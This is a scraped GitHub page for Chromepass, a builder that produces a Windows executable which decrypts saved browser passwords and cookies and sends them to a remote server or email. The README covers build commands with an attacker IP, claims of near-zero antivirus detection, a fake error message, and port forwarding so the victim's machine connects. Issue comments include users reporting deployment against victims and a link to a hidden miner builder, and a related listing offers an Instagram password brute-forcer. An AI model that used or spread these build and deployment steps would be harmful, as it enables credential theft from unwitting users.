Chromepass - Hacking Chrome Saved Passwords

Overview

Chromepass - Hacking Chrome Saved Passwords and Cookies

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

View Demo · Report Bug · Request Feature

Table of Contents


About The project

Chromepass is a python-based console application that generates a windows executable with the following features:

  • Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies
  • Send a file with the login/password combinations and cookies remotely (http server or email)
  • Undetectable by AV if done correctly
  • Custom icon
  • Custom error message
  • Customize port

AV Detection!

The new client build methodology practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion.

An example of latest scans (note: within 10-12 hours we go from 0-2 detections to 32 detections so run the analysis on your own builds):


Getting started

Dependencies and Requirements

This is a very simple application, which uses only:

  • Python - Tested on python 3.9+

It recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.

Installation

Chromepass requires Windows to compile! Support for linux and macOS may be added soon.

Clone the repository:

git clone https://github.com/darkarp/chromepass

Note: Alternatively to cloning the repository, you can download the latest release, since the repository may be more bug-prone.

Install the dependencies:

The dependencies are checked and installed automatically, so you can just skip to Usage. It's recommended that you use a clean VM, just to make sure there are no conflicts.

If you don't have the dependencies and your internet isn't fast, this will take a while. Go grab some coffee.


Usage

Chromepass is very straightforward. Start by running:

python create.py -h

A list of options will appear and are self explanatory.

Running without any parameters will build the server and the client connecting to 127.0.0.1.

A simple example of a build:

python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

After creating the server and the client, make sure you're running the server when the client is ran.

The cookies and passwords will be saved in json files on a new folder called data in the same directory as the server, separated by ip address.


Email

Chromepass supports sending the files via email, although it's still experimental. To enable this, you can use the --email flag while creating the server. You'll need two things, a username (your email) and a password (an app password).

To generate an app password you must go into your account settings -> Security and enable 2-step authentication (required!)

After 2-step authentication is enabled, you'll see a new option called App Passwords: 2-step-authentication

You want to click there and then choose the appropriate options and then generate a password: 2-step-authentication

After clicking Generate it will give you the needed password. You can use the username and password directly in the command or you can simply put it inside the config.ini, where it says YOUR_USERNAME and YOUR_PASSWORD.

Example with credentials in command

python create.py --error --message 'An Error has happened' --email --username myuser@gmail.com --password qwertyuiopasdfghh

If you put the credentials in the config file (you'll see where if you open this file)

python create.py --error --message 'An Error has happened' --email

Remote Notes

If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port.
For more general information, click here. If you're still not satisfied, perform a google search.


Manual dependency installation

The automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually.
Fortunately, there are only 2 dependencies:

Instead of the build tools you can also just install visual studio but it will take more space.

After successfully installing the build tools, you can simply run the rustup-init.exe from Rustup's website.

This completes the required dependencies and you should be good to go.


Errors, Bugs and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.


Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: [email protected]


Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

License

AGPL-3.0


Code Intelligence Status

Demo

til

Comments
  • ImportError: DLL load failer: The specified module could not be found.

    ImportError: DLL load failer: The specified module could not be found.

    File "C:\Users\*****\Desktop\chrome-password-hacking-master\create_server.py", line 3, in import os, sys, cgi, py2exe, BaseHTTPServer, sqlite3, win32crypt ImportError: DLL load failed: The specified module could not be found.

    I have tried running the powershell command, and have installed python 2.7 in 32 bit and everything else in 32 bit. Not sure why it still doesn't work.

    Errors not related to the code Fixed 
    opened by bowser0000 14
  • I don't receive the email.

    I don't receive the email.

    I'm somewhat new to python and learning online. When I try it on my own PC I get this error Traceback (most recent call last): File "server.py", line 97, in File "server.py", line 38, in getpass File "shutil.pyo", line 82, in copyfile IOError: [Errno 2] No such file or directory: 'C:\\Users\DELL\AppData\Local\Google\Chrome\User Data\Default\Login Data' I'm stuck here. I could use your help. Thanks in advance.

    Complete 
    opened by newestmindcoder 11
  • Can't get it to work at all on multiple computers

    Can't get it to work at all on multiple computers

    I tried the steps on different windows 10 computers and cannot get it to work. There is always some sort of error. I don't know anything about programming so I don't know the issue. I currently don't have any screenshots of the error because I uninstalled/deleted everything related to it. I also couldn't get your malkit to work.

    I am currently downloading a Windows 10 VM in a last ditch effort. I just gotta ask: Does this only work on a VM?

    bug enhancement In progress 
    opened by Genus-learner 9
  • Gmail blocking, when it try to login on other devices.

    Gmail blocking, when it try to login on other devices.

    So yes, gmail sending me an alert that someone was trying to log into my account, and it blocking it. I tried to start it on second pc, and it worked, because i already was logging there. I tunred on "Let less secure apps access your account" of course, so I don't know what is the problem. So I tried getting files directly by IP. But it giving me .py output, not .exe. How to change it?...

    enhancement Complete Errors not related to the code 
    opened by Subucc 9
  • when i am trying to create server nothing is happened

    when i am trying to create server nothing is happened

    Describe the bug A clear and concise description of what the bug is.

    To Reproduce Steps to reproduce the behavior:

    1. Go to '...'
    2. Click on '....'
    3. Scroll down to '....'
    4. See error

    Expected behavior A clear and concise description of what you expected to happen.

    Screenshots If applicable, add screenshots to help explain your problem.

    Software(please complete the following information):

    • OS: [e.g. Windows 10 Pro x64]
    • Python Version [e.g. 3.7.4]
    • Python Environment [e.g. Normal python, conda env]

    Additional context Add any other context about the problem here. image

    Errors not related to the code 
    opened by kiopik 8
  • Issue with the code

    Issue with the code

    File "create_server.py", line 2, in import os, sys, cgi, py2exe, BaseHTPPServer, sqlite3 , win32crypt ImportError: DLL load failer: The specified module could not be found. Any idea?

    Errors not related to the code Fixed 
    opened by JohnMos 8
  • Only cookies being sent?

    Only cookies being sent?

    So I got it working on multiple computers but for some of them they client only sends cookies? I've tried running it as admin and that hasnt done anything to help that

    Any suggestions?

    bug Complete 
    opened by Genus-learner 7
  • Batch / Shell Scripts for building

    Batch / Shell Scripts for building

    Is your feature request related to a problem? Please describe. The README has a lot of steps that can take a while to complete, for example, the build process from the Demo, and the "AV Detection" segment of the readme instruction.

    Describe the solution you'd like .bat or .sh files can be used to automate most (if not all) of the steps necessary to build the application. Alternatively, a Python script can be used to run everything, which could make supporting cross-platform usage easier.

    enhancement Complete 
    opened by iCrazyBlaze 5
  • What about a fake SMTP server support instead of email ?

    What about a fake SMTP server support instead of email ?

    Just like this https://github.com/aydinnyunus/WifiPassword-Stealer

    Also what do you think about these methods of protecting the excitable Here https://github.com/hawksh/Hidden-miner-builder

    opened by minanagehsalalma 5
  • create_server.py stuck on *** searching for required modules ***

    create_server.py stuck on *** searching for required modules ***

    Hi, I've got an issue like the title of this thread. It comes up after the script builds the "build, bdist.win32, winexe, collect-2.7, bundle-2.7, temp and dist" folders. I'm using Python 2.7 and py2exe 32-bit like instructed. I chose the option to email the fetched passwords via Gmail, and send them to a different email than the mail I gave up to login on Gmail.

    What's going wrong here?

    (Quick edit: I've left the script running like this for quite a while, so I really think it's stuck rather than actually searching for modules...)

    Screenshot: issue

    Complete 
    opened by lucs29 5
  • Error

    Error

    When I try it out on my PC, it works fine. But when I send it to the victim. He gets the Fake Error. And I get an email, but the password and User area
    is blank.

    Complete Errors not related to the code 
    opened by GR8Zen 4
  • link.exe not found

    link.exe not found

    [+] Building Server Compiling proc-macro2 v1.0.28 Compiling syn v1.0.74 Compiling winapi v0.3.9 Compiling memchr v2.4.0 Compiling futures-core v0.3.16 Compiling proc-macro-hack v0.5.19 Compiling log v0.4.14 Compiling futures-sink v0.3.16 Compiling lazy_static v1.4.0 Compiling winapi v0.2.8 error: linker link.exe not found | = note: program not found

    note: the msvc targets depend on the msvc linker but link.exe was not found

    note: please ensure that VS 2013, VS 2015, VS 2017, VS 2019 or VS 2022 was installed with the Visual C++ option

    error: could not compile futures-core due to previous error warning: build failed, waiting for other jobs to finish... error: could not compile log due to previous error error: could not compile memchr due to previous error error: could not compile proc-macro-hack due to previous error error: could not compile syn due to previous error error: could not compile proc-macro2 due to previous error error: could not compile winapi due to previous error [-] Server couldn't be copied: [Errno 2] No such file or directory: 'templates/chromepass-server/target/release/chromepass-server.exe' [+] Building Client Compiling winapi v0.3.9 Compiling proc-macro2 v1.0.24 Compiling libc v0.2.99 Compiling syn v1.0.64 Compiling serde v1.0.127 Compiling serde_derive v1.0.127 Compiling log v0.4.14 Compiling memchr v2.3.4 error: linker link.exe not found | = note: program not found

    note: the msvc targets depend on the msvc linker but link.exe was not found

    note: please ensure that VS 2013, VS 2015, VS 2017, VS 2019 or VS 2022 was installed with the Visual C++ option

    error: could not compile log due to previous error warning: build failed, waiting for other jobs to finish... error: could not compile memchr due to previous error error: could not compile syn due to previous error error: could not compile serde_derive due to previous error error: could not compile serde due to previous error error: could not compile libc due to previous error error: could not compile proc-macro2 due to previous error error: could not compile winapi due to previous error [-] Client couldn't be copied: [Errno 2] No such file or directory: 'templates/chromepass-build/target/release/chromepass.exe' [-] Error building the server [-] Error building the client

    opened by LLSWIMS 1
  • Client not communicating with Server

    Client not communicating with Server

    I had this running great. I would double click the client, I would see the connection to the server and then the text files would generate. Then all of a sudden, the client stopped sending/communicating to the server.

    Here are my steps:

    -Run create.py with no parameters

    -Server and client built successfully

    -Run the server and keep it open

    -Run the client

    -Check the server...but server does not show a connection (just the usual "waiting for connections")

    I have used this successfully about a week ago both for local testing and with port forwarding and static ip but now I can't even get it to run locally. I have tried on 3 different computers which finish the build successfully w/no errors but I receive the same issue. All computers with the below specs:

    Running on: -Windows 10 Pro x64 -Python 3.10 -Built on both Pycharm and Powershell (I tried on both....which build successfully but I receive the same outcome) -No antivirus installed and Windows firewall is disabled -Downloaded a fresh copy of all files from Github -Also tried the exact copy I used a week ago

    One day it was working....the next it wasn't. Any suggestions on what I could try to get the communication to occur? CP

    bug In progress 
    opened by twhitey666 3
  • Emails not being received

    Emails not being received

    I've built the most recent version and the client and server are working perfectly but no emails are received. Is there any way to check on the client to check what is happening?

    I've also noticed the client won't include passwords synced using a Google account or imported passwords.

    bug In progress 
    opened by graemeh70 3
Releases(V4.1.4)
Owner
darkArp
Malware Analyst | Penetration Tester
darkArp
A python script to brute-force guess the passwords to Instagram accounts

Instagram-Brute-Force The purpose of this script is to brute-force guess the passwords to Instagram accounts. Specifics: Comes with 2 separate modes i

Moondog 2 Nov 16, 2021
An auxiliary tool for iot vulnerability hunter

firmeye - IoT固件漏洞挖掘工具 firmeye 是一个 IDA 插件,基于敏感函数参数回溯来辅助漏洞挖掘。我们知道,在固件漏洞挖掘中,从敏感/危险函数出发,寻找其参数来源,是一种很有效的漏洞挖掘方法,但程序中调用敏感函数的地方非常多,人工分析耗时费力,通过该插件,可以帮助排除大部分的安全

Firmy Yang 171 Nov 28, 2022
I hacked my own webcam from a Kali Linux VM in my local network, using Ettercap to do the MiTM ARP poisoning attack, sniffing with Wireshark, and using metasploit

plan I - Linux Fundamentals Les utilisateurs et les droits Installer des programmes avec apt-get Surveiller l'activité du système Exécuter des program

148 Dec 22, 2022
Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

FaisalFs 16 Mar 24, 2022
AMC- Automatic Media Access Control [MAC] Address Spoofing Tool

AMC (Automatic Media Access Control [MAC] Address Spoofing tool), helps you to protect your real network hardware identity. Each entered time interval your hardware address was changed automatically.

Dipen Chavan 14 Dec 23, 2022
Details,PoC and patches for CVE-2021-45383 & CVE-2021-45384

CVE-2021-45383 & CVE-2021-45384 There are several network-layer vulnerabilities in the official server of Minecraft: Bedrock Edition (aka Bedrock Serv

20 Apr 07, 2022
Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts.

Oh365 User Finder Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to ident

Joe Helle 414 Jan 02, 2023
SSLyze is a fast and powerful SSL/TLS scanning tool and Python library.

SSLyze SSLyze is a fast and powerful SSL/TLS scanning tool and Python library. SSLyze can analyze the SSL/TLS configuration of a server by connecting

Alban Diquet 2.8k Jan 03, 2023
Uses Sharphound, Bloodhound and Neo4j to produce an actionable list of attack paths for targeted remediation.

GoodHound ______ ____ __ __ / ____/___ ____ ____/ / / / /___ __ ______ ____/ / / / __/ __ \/ __ \/ __

idna 352 Jan 02, 2023
To explore creating an application that detects available connections at once from wifi and bluetooth

Signalum A Linux Package to detect and analyze existing connections from wifi and bluetooth. Also checkout the Desktop Application. Signalum Installat

BISOHNS 56 Mar 03, 2021
A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

master_librarian A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities. To install requirements: $ sudo pyth

CoolerVoid 167 Dec 19, 2022
NS-LOOKUP - A python script for scanning website for getting ip address of a website

NS-LOOKUP A python script for scanning website for getting ip address of a websi

Spider Anongreyhat 5 Aug 02, 2022
NS-Defacer: a auto html injecter, In other words It's a auto defacer to deface a lot of websites in less time

Overview NS-Defacer is a auto html injecter, In other words It's a auto defacer

NightSec 10 Nov 19, 2022
Implementation of an attack on a tropical algebra discrete logarithm based protocol

Implementation of an attack on a tropical algebra discrete logarithm based protocol This code implements the attack detailed in the paper: On the trop

3 Dec 30, 2021
This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

26 Dec 26, 2022
adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

136 Jan 02, 2023
Writeups for wtf-CTF hosted by Manipal Information Security Team as part of Techweek2021- INCOGNITO

wtf-CTF_Writeups Table of Contents Table of Contents Crypto Misc Reverse Pwn Web Crypto wtf_Bot Author: Madjelly Join the discord server!You know how

6 Jun 07, 2021
For educational purposes only. (Uzbek Edition)

DISCLAIMER 💣 Ushbu skriptdagi materiallar bilan bog'liq har qanday xatti-harakatlar faqat sizning javobgarligingizdir. Ushbu skriptdagi ma'lumotlarda

Husniddin Murodov 1 Feb 12, 2022
Scans all drives for log4j jar files and gets their version from the manifest

log4shell_scanner Scans all drives for log4j jar files and gets their version from the manifest. Windows and Windows Server only.

Zdeněk Loučka 1 Dec 29, 2021
NExfil is an OSINT tool written in python for finding profiles by username.

NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within few seconds.

thewhiteh4t 1.4k Jan 01, 2023